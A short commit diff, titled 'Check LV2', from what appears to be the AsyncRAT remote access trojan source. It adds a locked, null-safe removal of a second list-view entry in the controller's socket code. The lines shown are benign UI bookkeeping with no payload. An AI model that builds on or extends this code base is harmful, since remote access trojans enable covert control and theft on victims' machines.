Check LV2
This commit is contained in:
parent
1dd3e2e9f3
commit
492c47cf59
@ -125,6 +125,8 @@ namespace AsyncRAT_Sharp.Sockets
|
||||
{
|
||||
lock (Settings.Listview1Lock)
|
||||
LV.Remove();
|
||||
lock (Settings.Listview3Lock)
|
||||
LV2?.Remove();
|
||||
}
|
||||
catch { }
|
||||
}));
|
||||
|
Loading…
x
Reference in New Issue
Block a user